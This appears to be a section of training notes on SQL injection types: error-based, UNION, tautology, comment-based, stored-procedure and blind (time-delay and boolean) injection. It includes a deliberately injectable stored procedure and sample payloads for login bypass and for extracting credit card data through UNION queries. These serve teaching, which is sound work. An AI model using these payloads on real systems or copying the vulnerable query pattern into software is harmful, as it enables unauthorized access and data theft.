13.2 Types of SQL Injection
Types of SQL Injection
- Error Based SQL Injection:
- UNION SQL Injection
- System Stored Procedure
- Tautology
- End of Line Comment
- Illegal/Logically Incorrect Query
- Blind SQL Injection:
- Time Delay
- Boolean Exploitation
- There are two main types of SQL injection:
- Error-Based SQL Injection:
- Attackers intentionally insert bad input into an application, causing it to throw database errors.
- The attacker reads the database-level error messages that result in order to find an SQL injection vulnerability in the application.
- Based on this, the attacker then injects SQL queries that are specifically designed to compromise the data security of the application.
- Blind SQL Injection:
- The attacker has no error messages from the system with which to work.
- Instead, the attacker simply sends a malicious SQL query to the database.
Error Based SQL Injection (?)
- Error based SQL Injection forces the database to perform some operation in which the result will be an error.
- This exploitation may differ from one DBMS to the other.
System Stored Procedure: Attackers exploit databases' stored procedures to perpetrate their attacks.
CREATE PROCEDURE Login @user_name varchar(20), @password varchar(20) AS DECLARE @query varchar(250) SET @query = 'SELECT 1 FROM usertable WHERE username = ' + @user_name + ' and password = ' + @password EXEC(@query) GO
- If the attacker enters the following inputs in the application input fields using the above stored procedure running in the back end, the attacker will able to login with any password.
anyusername or 1=1' anypassword
End of Line Comment: After injecting code into a particular field, legitimate code that follows if nullified through usage of end of line comments:
SELECT * FROM user WHERE name = 'x' AND userid IS NULL; --';
- Comments in a line of code are often denoted by (--), are ignored by the query.
- The database will execute the code until it reaches the commented portion, after which it will ignore the rest of the query.
SELECT * FROM members WHERE username = 'admin'--' AND password = 'password'
Illegal/Logically Incorrect Query: An attacker may gain knowledge by injecting illegal/logically incorrect requests such as injectable parameters, data types, names of tables, etc.
send an incorrect query to the database intentionally to generate an error message that may be helpful in carrying out further attacks
Tautology: Injecting statements that are always true so that queries always return results upon evaluation of a WHERE condition:
SELECT * FROM users WHERE name = '' OR '1'='1';
- use a conditional OR clause
- It can be used to bypass user authentication.
Union SQL Injection: "UNION SELECT" statement returns the union of the intended dataset with the target dataset:
SELECT Name, Phone, Address FROM Users WHERE Id=1 UNION ALL SELECT creditCardNumber,1,1 FROM CreditCardTable.
by adding a single quote character (')
Union SQL Injection
- This technique involves joining a forged query to the original query.
- Result of forged query will be joined to the result of the original query thereby allowing to obtain the values of fields of other tables.
- Example:
SELECT Name, Phone, Address FROM Users WHERE Id=$id
- Now set the following Id value:
$id=1 UNION ALL SELECT creditCardNumber, 1, 1 FROM CreditCardTable
- The final query is as shown below:
SELECT Name, Phone, Address FROM Users WHERE Id=1 UNION ALL SELECT creditCardNumber, 1, 1 FROM CreditCardTable
- The above query joins the result of the original query with all the credit card users.
Blind SQL Injection
- No Error Message: Blind SQL Injection is used when a web application is vulnerable to an SQL injection but the results of the injection are not visible to the attacker.
- Generic Page: Blind SQL injection is identical to a normal SQL Injection except that when an attacker attempts to exploit an application rather than seeing a useful error message, a generic custom page is displayed.
- Time-intensive: This type of attack can become time-intensive because a new statement must be crafted for each bit recovered.
Note: An attacker can still steal data by asking a series of True and False questions through SQL statements.
No Error Messages Returned
- A generic error message may help the attacker to carry out SQL injection attacks on the application.
- However, if the developer turns off the generic error messages, the application will return a custom error message, which is not helpful to the attacker.
- In this case the attacker will attempt a blind SQL injection attack instead.
Blind SQL Injection: WAITFOR DELAY (YES or NO Response)
a.k.a. Time-based SQL Injection
Boolean Exploitation Technique
- Multiple valid statements that evaluate to true and false are supplied in the affected parameter in the HTTP request.
- By comparing the response page between both conditions, the attackers can infer whether or not the injection was successful.
- This technique is very useful when the tester find a Blind SQL Injection situation, in which nothing is known on the outcome of an operation.
a.k.a inferential SQL Injection